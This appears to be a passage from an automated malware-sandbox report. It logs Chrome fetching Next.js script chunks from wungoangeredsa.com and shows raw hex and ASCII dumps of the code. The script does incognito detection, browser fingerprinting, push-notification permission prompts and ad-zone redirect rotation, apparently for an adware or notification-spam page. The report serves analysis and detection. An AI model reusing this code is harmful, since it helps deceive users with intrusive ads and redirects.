                                                                                                          Data Ascii: (o=2&u[0]?r.return:u[0]?r.throw||((o=r.return)&&o.call(r),0):r.next)&&!(o=o.call(r,u[1])).done)return o;switch(r=0,o&&(u=[2&u[0],o.value]),u[0]){case 0:case 1:o=u;break;case 4:return i.label++,{value:u[1],done:!1};case 5:i.label++,r=u[1],u=[0];continue;ca
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 20 69 73 53 61 66 61 72 69 28 29 7b 72 65 74 75 72 6e 20 34 34 3d 3d 3d 66 65 69 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 69 73 43 68 72 6f 6d 65 28 29 7b 72 65 74 75 72 6e 20 35 31 3d 3d 3d 66 65 69 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 69 73 46 69 72 65 66 6f 78 28 29 7b 72 65 74 75 72 6e 20 32 35 3d 3d 3d 66 65 69 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 69 73 4d 53 49 45 28 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 6e 61 76 69 67 61 74 6f 72 2e 6d 73 53 61 76 65 42 6c 6f 62 26 26 61 73 73 65 72 74 45 76 61 6c 54 6f 53 74 72 69 6e 67 28 33 39 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 65 77 53 61 66 61 72 69 54 65 73 74 28 29 7b 76 61 72 20 65 3d 53 74 72 69 6e 67 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 3b 74 72 79 7b 77 69 6e 64 6f 77 2e 69 6e
                                                                                                          Data Ascii: isSafari(){return 44===feid()}function isChrome(){return 51===feid()}function isFirefox(){return 25===feid()}function isMSIE(){return void 0!==navigator.msSaveBlob&&assertEvalToString(39)}function newSafariTest(){var e=String(Math.random());try{window.in
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 2a 4d 61 74 68 2e 72 6f 75 6e 64 28 67 65 74 51 75 6f 74 61 4c 69 6d 69 74 28 29 2f 31 30 34 38 35 37 36 29 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 6a 65 63 74 28 6e 65 77 20 45 72 72 6f 72 28 22 64 65 74 65 63 74 49 6e 63 6f 67 6e 69 74 6f 20 73 6f 6d 65 68 6f 77 20 66 61 69 6c 65 64 20 74 6f 20 71 75 65 72 79 20 73 74 6f 72 61 67 65 20 71 75 6f 74 61 3a 20 22 2b 65 2e 6d 65 73 73 61 67 65 29 29 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 6c 64 43 68 72 6f 6d 65 50 72 69 76 61 74 65 54 65 73 74 28 29 7b 28 30 2c 77 69 6e 64 6f 77 2e 77 65 62 6b 69 74 52 65 71 75 65 73 74 46 69 6c 65 53 79 73 74 65 6d 29 28 30 2c 31 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 5f 5f 63 61 6c 6c 62 61 63 6b 28 21 31 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                          Data Ascii: *Math.round(getQuotaLimit()/1048576))}),(function(e){reject(new Error("detectIncognito somehow failed to query storage quota: "+e.message))}))}function oldChromePrivateTest(){(0,window.webkitRequestFileSystem)(0,1,(function(){__callback(!1)}),(function(){
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6f 61 64 69 6e 67 3b 72 65 74 75 72 6e 20 65 2e 70 61 73 74 44 65 6c 61 79 2c 6e 75 6c 6c 7d 7d 3b 72 28 65 2c 50 72 6f 6d 69 73 65 29 3f 61 2e 6c 6f 61 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 65 3f 61 2e 6c 6f 61 64 65 72 3d 65 3a 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 61 3d 6f 28 7b 7d 2c 61 2c 65 29 29 3b 69 66 28 28 61 3d 6f 28 7b 7d 2c 61 2c 74 29 29 2e 73 75 73 70 65 6e 73 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 73 75 73 70 65 6e 73 65 20 6f 70 74 69 6f 6e 20 75 73 61 67 65 20 69 6e 20 6e 65 78 74 2f 64 79 6e 61 6d 69 63 2e 20 52 65 61 64 20 6d 6f 72 65 3a 20 68 74 74 70 73 3a 2f 2f 6e 65
                                                                                                          Data Ascii: oading;return e.pastDelay,null}};r(e,Promise)?a.loader=function(){return e}:"function"===typeof e?a.loader=e:"object"===typeof e&&(a=o({},a,e));if((a=o({},a,t)).suspense)throw new Error("Invalid suspense option usage in next/dynamic. Read more: https://ne
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6e 20 66 28 65 29 7b 76 61 72 20 74 3d 65 28 29 2c 6e 3d 7b 6c 6f 61 64 69 6e 67 3a 21 30 2c 6c 6f 61 64 65 64 3a 6e 75 6c 6c 2c 65 72 72 6f 72 3a 6e 75 6c 6c 7d 3b 72 65 74 75 72 6e 20 6e 2e 70 72 6f 6d 69 73 65 3d 74 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 2e 6c 6f 61 64 69 6e 67 3d 21 31 2c 6e 2e 6c 6f 61 64 65 64 3d 65 2c 65 7d 29 29 2e 63 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 2e 6c 6f 61 64 69 6e 67 3d 21 31 2c 6e 2e 65 72 72 6f 72 3d 65 2c 65 7d 29 29 2c 6e 7d 76 61 72 20 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 5f 6c 6f 61 64 46 6e 3d 74 2c 74 68 69 73 2e 5f 6f 70 74 73 3d 6e 2c 74
                                                                                                          Data Ascii: n f(e){var t=e(),n={loading:!0,loaded:null,error:null};return n.promise=t.then((function(e){return n.loading=!1,n.loaded=e,e})).catch((function(e){throw n.loading=!1,n.error=e,e})),n}var v=function(){function e(t,n){r(this,e),this._loadFn=t,this._opts=n,t
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 74 75 72 6e 20 74 68 69 73 2e 5f 63 61 6c 6c 62 61 63 6b 73 2e 61 64 64 28 65 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 5f 63 61 6c 6c 62 61 63 6b 73 2e 64 65 6c 65 74 65 28 65 29 7d 7d 7d 5d 29 2c 65 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 6c 29 7b 76 61 72 20 74 3d 6e 65 77 20 76 28 65 2c 6f 29 3b 6c 3d 7b 67 65 74 43 75 72 72 65 6e 74 56 61 6c 75 65 3a 74 2e 67 65 74 43 75 72 72 65 6e 74 56 61 6c 75 65 2e 62 69 6e 64 28 74 29 2c 73 75 62 73 63 72 69 62 65 3a 74 2e 73 75 62 73 63 72 69 62 65 2e 62 69 6e 64 28 74 29 2c 72 65 74 72 79 3a 74 2e 72 65 74 72 79 2e 62 69 6e 64 28 74 29 2c 70 72 6f 6d 69 73 65 3a 74 2e
                                                                                                          Data Ascii: turn this._callbacks.add(e),function(){t._callbacks.delete(e)}}}]),e}();function m(e){return function(e,t){var n=function(){if(!l){var t=new v(e,o);l={getCurrentValue:t.getCurrentValue.bind(t),subscribe:t.subscribe.bind(t),retry:t.retry.bind(t),promise:t.
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 65 66 61 75 6c 74 3a 74 2c 65 29 3a 6e 75 6c 6c 3b 76 61 72 20 74 7d 29 2c 5b 65 2c 6e 5d 29 7d 3b 72 65 74 75 72 6e 20 6d 2e 70 72 65 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 29 7d 2c 6d 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 4c 6f 61 64 61 62 6c 65 43 6f 6d 70 6f 6e 65 6e 74 22 2c 69 2e 64 65 66 61 75 6c 74 2e 66 6f 72 77 61 72 64 52 65 66 28 6d 29 7d 28 66 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 5b 5d 3b 65 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 72 3d 65 2e 70 6f 70 28 29 3b 6e 2e 70 75 73 68 28 72 28 74 29 29 7d 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 6e 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 65 2e 6c 65 6e 67 74 68 29
                                                                                                          Data Ascii: efault:t,e):null;var t}),[e,n])};return m.preload=function(){return n()},m.displayName="LoadableComponent",i.default.forwardRef(m)}(f,e)}function p(e,t){for(var n=[];e.length;){var r=e.pop();n.push(r(t))}return Promise.all(n).then((function(){if(e.length)
                                                                                                          2025-01-06 11:09:21 UTC304INData Raw: 3d 3d 72 2e 75 73 65 53 79 6e 63 45 78 74 65 72 6e 61 6c 53 74 6f 72 65 3f 72 2e 75 73 65 53 79 6e 63 45 78 74 65 72 6e 61 6c 53 74 6f 72 65 3a 63 7d 2c 34 33 31 30 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 28 32 30 34 35 32 29 7d 2c 34 32 38 33 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 74 5b 53 79 6d 62 6f 6c 2e 68 61 73 49 6e 73 74 61 6e 63 65 5d 3f 21 21 74 5b 53 79 6d 62 6f 6c 2e 68 61 73 49 6e 73 74 61 6e 63 65 5d 28 65 29 3a 65 20 69 6e
                                                                                                          Data Ascii: ==r.useSyncExternalStore?r.useSyncExternalStore:c},43100:function(e,t,n){"use strict";e.exports=n(20452)},42838:function(e,t,n){"use strict";function r(e,t){return null!=t&&"undefined"!==typeof Symbol&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):e in
                                                                                                          2025-01-06 11:09:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          39192.168.2.450085104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC553OUTGET /_next/static/chunks/f11a4c032471831f-1736072686539-df6b842f2183863b.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-e2b6"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4162ea914370-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 37 64 63 31 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 34 39 36 34 5d 2c 7b 37 34 38 30 31 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 28 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 3d 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 22 2f 5b 6c 61 6e 64 69 6e 67 4e 61 6d 65 5d 2f 5b 63 6f 6e 66 69 67 49 64 5d 2f 5b 5b 2e 2e 2e 73 6c 75 67 5d 5d 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 28 31 39 39 31 36 29 7d 5d 29 7d 2c 31 39 39 31 36 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 65 29 2c 74 2e 64 28 65
                                                                                                          Data Ascii: 7dc1(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[14964],{74801:function(n,e,t){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[landingName]/[configId]/[[...slug]]",function(){return t(19916)}])},19916:function(n,e,t){"use strict";t.r(e),t.d(e
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 28 30 2c 64 2e 50 54 29 28 29 2c 6c 2e 56 38 26 26 28 30 2c 70 2e 53 6a 29 28 7b 63 75 72 72 65 6e 74 54 61 62 55 72 6c 3a 6e 7d 29 7d 3b 72 65 74 75 72 6e 28 30 2c 73 2e 75 73 65 45 66 66 65 63 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 28 30 2c 64 2e 62 50 29 28 22 43 68 65 63 6b 50 65 72 6d 69 73 73 69 6f 6e 22 29 2c 22 4e 6f 74 69 66 69 63 61 74 69 6f 6e 22 69 6e 20 77 69 6e 64 6f 77 29 73 77 69 74 63 68 28 4e 6f 74 69 66 69 63 61 74 69 6f 6e 2e 70 65 72 6d 69 73 73 69 6f 6e 29 7b 63 61 73 65 22 67 72 61 6e 74 65 64 22 3a 28 30 2c 64 2e 63 4d 29 28 22 5b 43 68 65 63 6b 50 65 72 6d 69 73 73 69 6f 6e 5d 3a 20 67 72 61 6e 74 65 64 22 29 2c 6f 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 64 65 6e 69 65 64 22 3a 28 30 2c 64 2e 63 4d 29 28 22 5b 43
                                                                                                          Data Ascii: (0,d.PT)(),l.V8&&(0,p.Sj)({currentTabUrl:n})};return(0,s.useEffect)((function(){if((0,d.bP)("CheckPermission"),"Notification"in window)switch(Notification.permission){case"granted":(0,d.cM)("[CheckPermission]: granted"),o();break;case"denied":(0,d.cM)("[C
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 7d 2c 73 73 72 3a 21 31 7d 29 2c 41 3d 72 28 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 65 28 36 31 31 35 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 36 31 31 35 29 29 7d 29 2c 7b 6c 6f 61 64 61 62 6c 65 47 65 6e 65 72 61 74 65 64 3a 7b 77 65 62 70 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 36 31 31 35 5d 7d 7d 2c 73 73 72 3a 21 31 7d 29 2c 5f 3d 72 28 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 65 28 36 36 30 33 37 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 36 36 30 33 37 29 29 7d 29 2c 7b 6c 6f 61 64 61 62 6c 65 47 65 6e 65 72 61 74 65 64 3a 7b 77 65 62 70 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 36 36 30 33 37 5d 7d 7d 2c 73 73 72 3a 21 31 7d 29
                                                                                                          Data Ascii: },ssr:!1}),A=r()((function(){return t.e(6115).then(t.bind(t,6115))}),{loadableGenerated:{webpack:function(){return[6115]}},ssr:!1}),_=r()((function(){return t.e(66037).then(t.bind(t,66037))}),{loadableGenerated:{webpack:function(){return[66037]}},ssr:!1})
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6e 75 6c 6c 21 3d 3d 48 26 26 76 6f 69 64 20 30 21 3d 3d 48 3f 48 3a 5b 5d 29 2c 74 6e 3d 65 6e 2e 69 6e 41 70 70 2c 6f 6e 3d 65 6e 2e 70 75 73 68 2c 61 6e 3d 65 6e 2e 76 69 67 6e 65 74 74 65 2c 72 6e 3d 65 6e 2e 72 65 76 65 72 73 65 2c 75 6e 3d 65 6e 2e 6e 6f 6e 55 6e 69 71 75 65 2c 73 6e 3d 65 6e 2e 6e 6f 6e 55 6e 69 71 75 65 54 65 65 6e 3b 28 30 2c 78 2e 75 29 28 29 3b 76 61 72 20 63 6e 2c 6c 6e 2c 64 6e 2c 66 6e 2c 70 6e 2c 76 6e 2c 6d 6e 2c 62 6e 2c 45 6e 2c 67 6e 3d 63 28 29 2e 69 73 49 6f 73 3b 72 65 74 75 72 6e 20 75 2e 6e 2e 70 72 65 76 69 65 77 3f 28 30 2c 69 2e 74 5a 29 28 69 2e 48 59 2c 7b 63 68 69 6c 64 72 65 6e 3a 67 7d 29 3a 28 30 2c 69 2e 42 58 29 28 69 2e 48 59 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 21 75 2e 6e 2e 72 64 26 26 28 30 2c 69 2e
                                                                                                          Data Ascii: null!==H&&void 0!==H?H:[]),tn=en.inApp,on=en.push,an=en.vignette,rn=en.reverse,un=en.nonUnique,sn=en.nonUniqueTeen;(0,x.u)();var cn,ln,dn,fn,pn,vn,mn,bn,En,gn=c().isIos;return u.n.preview?(0,i.tZ)(i.HY,{children:g}):(0,i.BX)(i.HY,{children:[!u.n.rd&&(0,i.
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 3d 6c 6e 26 26 6c 6e 2c 69 73 41 6e 61 6c 79 74 69 63 73 45 6e 61 62 6c 65 3a 4b 2c 69 70 70 5a 6f 6e 65 73 45 78 69 73 74 3a 21 21 28 6e 75 6c 6c 3d 3d 3d 47 7c 7c 76 6f 69 64 20 30 3d 3d 3d 47 3f 76 6f 69 64 20 30 3a 47 2e 6c 65 6e 67 74 68 29 2c 73 68 6f 75 6c 64 52 65 64 69 72 65 63 74 4f 6e 6c 79 57 68 65 6e 55 73 65 72 41 63 74 69 76 65 3a 6e 75 6c 6c 21 3d 3d 28 64 6e 3d 6e 75 6c 6c 3d 3d 3d 46 7c 7c 76 6f 69 64 20 30 3d 3d 3d 46 7c 7c 6e 75 6c 6c 3d 3d 3d 28 72 3d 46 2e 6e 6f 6e 55 6e 69 71 75 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 73 68 6f 75 6c 64 52 65 64 69 72 65 63 74 4f 6e 6c 79 57 68 65 6e 55 73 65 72 41 63 74 69 76 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 64 6e 26 26 64 6e 2c 69 73 56 69 67 6e 65 74 74 65 45
                                                                                                          Data Ascii: =ln&&ln,isAnalyticsEnable:K,ippZonesExist:!!(null===G||void 0===G?void 0:G.length),shouldRedirectOnlyWhenUserActive:null!==(dn=null===F||void 0===F||null===(r=F.nonUnique)||void 0===r?void 0:r.shouldRedirectOnlyWhenUserActive)&&void 0!==dn&&dn,isVignetteE
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 5a 29 28 41 2c 7b 7a 6f 6e 65 44 65 74 61 69 6c 73 3a 6f 6e 2e 7a 6f 6e 65 73 44 65 74 61 69 6c 73 2c 7a 6f 6e 65 4f 70 74 69 6f 6e 73 3a 6e 75 6c 6c 3d 3d 3d 46 7c 7c 76 6f 69 64 20 30 3d 3d 3d 46 3f 76 6f 69 64 20 30 3a 46 2e 70 75 73 68 2c 69 73 41 6e 61 6c 79 74 69 63 73 45 6e 61 62 6c 65 3a 4b 2c 64 6f 50 75 73 68 44 6f 6d 61 69 6e 73 3a 6e 6e 7d 29 2c 56 26 26 43 3c 3d 28 6e 75 6c 6c 3d 3d 3d 56 7c 7c 76 6f 69 64 20 30 3d 3d 3d 56 3f 76 6f 69 64 20 30 3a 56 2e 63 68 61 6e 63 65 4f 66 52 65 63 6f 72 64 69 6e 67 29 26 26 28 6e 75 6c 6c 3d 3d 3d 56 7c 7c 76 6f 69 64 20 30 3d 3d 3d 56 3f 76 6f 69 64 20 30 3a 56 2e 69 73 45 6e 61 62 6c 65 64 29 26 26 21 75 2e 6e 2e 66 75 6c 6c 5f 73 74 6f 72 79 26 26 28 30 2c 69 2e 74 5a 29 28 55 2c 7b 7d 29 2c 61 6e 26
                                                                                                          Data Ascii: Z)(A,{zoneDetails:on.zonesDetails,zoneOptions:null===F||void 0===F?void 0:F.push,isAnalyticsEnable:K,doPushDomains:nn}),V&&C<=(null===V||void 0===V?void 0:V.chanceOfRecording)&&(null===V||void 0===V?void 0:V.isEnabled)&&!u.n.full_story&&(0,i.tZ)(U,{}),an&
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 73 65 6c 66 21 3d 3d 77 69 6e 64 6f 77 2e 74 6f 70 2c 69 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 33 32 30 3b 6e 3f 28 72 28 7b 74 79 70 65 3a 4f 2e 4b 2e 73 65 74 49 66 72 61 6d 65 2c 70 61 79 6c 6f 61 64 3a 7b 69 73 45 6e 61 62 6c 65 64 3a 65 2c 69 73 49 66 72 61 6d 65 3a 21 30 2c 69 73 53 6d 61 6c 6c 57 69 6e 64 6f 77 3a 69 2c 6f 6e 63 6c 69 63 6b 5a 6f 6e 65 3a 6e 75 6c 6c 21 3d 3d 74 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 6e 75 6c 6c 7d 7d 29 2c 28 30 2c 64 2e 63 4d 29 28 22 49 66 72 61 6d 65 20 64 65 74 65 63 74 65 64 22 29 29 3a 28 30 2c 64 2e 63 4d 29 28 22 49 66 72 61 6d 65 20 6e 6f 74 20 64 65 74 65 63 74 65 64 22 29 7d 3b 72 65 74 75 72
                                                                                                          Data Ascii: ar n=function(){var n=window.self!==window.top,i=window.innerWidth<320;n?(r({type:O.K.setIframe,payload:{isEnabled:e,isIframe:!0,isSmallWindow:i,onclickZone:null!==t&&void 0!==t?t:null}}),(0,d.cM)("Iframe detected")):(0,d.cM)("Iframe not detected")};retur
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6d 69 73 73 69 6f 6e 54 69 6d 65 72 2c 68 3d 6c 2e 69 66 72 61 6d 65 2c 77 3d 6c 2e 70 72 6f 78 79 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 74 3d 21 28 6e 75 6c 6c 3d 3d 3d 6c 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 69 73 46 72 61 75 64 50 72 65 76 65 6e 74 69 6f 6e 45 6e 61 62 6c 65 64 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 7c 7c 75 2e 6e 2e 70 72 65 76 69 65 77 3f 28 30 2c 69 2e 74 5a 29 28 69 2e 48 59 2c 7b 63 68 69 6c 64 72 65 6e 3a 73 7d 29 3a 28 30 2c 69 2e 42 58 29 28 69 2e 48 59 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 73 2c 28 6e 75 6c 6c 3d 3d 3d 67 7c 7c 76 6f 69 64 20 30 3d 3d 3d 67 3f 76 6f 69 64 20 30 3a 67 2e 69 73 45 6e 61 62 6c 65 64 29 26 26 28 6e 75 6c 6c 3d 3d 3d 67 7c 7c 76 6f 69 64 20 30 3d 3d
                                                                                                          Data Ascii: missionTimer,h=l.iframe,w=l.proxy;return null===(t=!(null===l||void 0===l?void 0:l.isFraudPreventionEnabled))||void 0===t||t||u.n.preview?(0,i.tZ)(i.HY,{children:s}):(0,i.BX)(i.HY,{children:[s,(null===g||void 0===g?void 0:g.isEnabled)&&(null===g||void 0==
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 29 2c 28 30 2c 64 2e 63 4d 29 28 22 44 69 73 70 61 74 63 68 65 64 20 6e 6f 74 69 66 69 63 61 74 69 6f 6e 20 73 74 61 74 75 73 20 74 6f 20 73 74 6f 72 65 22 2c 74 29 7d 3b 72 65 74 75 72 6e 28 30 2c 64 2e 63 4d 29 28 22 41 64 64 69 6e 67 20 65 76 65 6e 74 20 6c 69 73 74 65 6e 65 72 20 66 6f 72 20 70 75 73 68 5f 6f 6e 6c 6f 61 64 5f 72 65 61 64 79 22 29 2c 77 69 6e 64 6f 77 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 53 74 61 74 75 73 52 65 61 64 79 26 26 77 69 6e 64 6f 77 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 53 74 61 74 75 73 52 65 73 75 6c 74 26 26 77 69 6e 64 6f 77 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 53 74 61 74 75 73 52 65 73 75 6c 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 28 7b 73 74 61 74 75 73 3a 6e
                                                                                                          Data Ascii: ),(0,d.cM)("Dispatched notification status to store",t)};return(0,d.cM)("Adding event listener for push_onload_ready"),window.notificationStatusReady&&window.notificationStatusResult&&window.notificationStatusResult.forEach((function(n){return e({status:n
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 70 22 3a 22 6f 6e 63 6c 69 63 6b 22 2c 6f 61 69 64 3a 69 2e 6f 61 69 64 2c 6f 73 56 65 72 73 69 6f 6e 3a 74 2c 73 75 62 49 64 3a 69 2e 75 73 65 72 44 61 74 61 2e 73 75 62 49 64 2c 70 61 73 73 50 61 72 61 6d 54 6f 50 61 72 61 6d 73 3a 65 7d 29 3b 68 2e 70 75 73 68 28 7b 7a 6f 6e 65 4e 61 6d 65 3a 75 2c 75 72 6c 3a 66 2c 74 61 62 3a 73 2c 77 65 69 67 68 74 3a 72 7d 29 7d 65 6c 73 65 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 2f 72 6f 74 61 74 65 3a 5c 6e 22 2c 22 41 64 20 61 74 20 69 6e 64 65 78 20 22 2e 63 6f 6e 63 61 74 28 6f 29 2c 22 5c 6e 22 2c 22 5a 6f 6e 65 4e 61 6d 65 3a 20 22 2e 63 6f 6e 63 61 74 28 75 29 2c 22 5c 6e 22 2c 22 54 61 62 3a 20 22 2e 63 6f 6e 63 61 74 28 73 29 2c 22 5c 6e 22 2c 22 48 61 73 20 6e 6f 20 63 6c 69 63 6b 20 55 52 4c 2e
                                                                                                          Data Ascii: p":"onclick",oaid:i.oaid,osVersion:t,subId:i.userData.subId,passParamToParams:e});h.push({zoneName:u,url:f,tab:s,weight:r})}else console.error("/rotate:\n","Ad at index ".concat(o),"\n","ZoneName: ".concat(u),"\n","Tab: ".concat(s),"\n","Has no click URL.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          40192.168.2.450084104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC412OUTGET /_next/static/chunks/87040b3d41357533-1736072686539.6a095265338b008b.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
